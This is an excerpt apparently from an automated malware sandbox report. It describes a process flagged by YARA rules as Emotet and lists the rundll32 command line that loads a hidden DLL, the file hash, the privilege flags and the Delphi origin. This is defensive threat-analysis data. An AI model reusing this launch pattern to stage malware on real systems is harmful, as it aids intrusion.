                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
                                                                Imagebase:0xc00000
                                                                File size:44544 bytes
                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2340431791.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2340448062.0000000000330000.00000040.00000001.sdmp, Author: Joe Security
                                                                Reputation:moderate

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >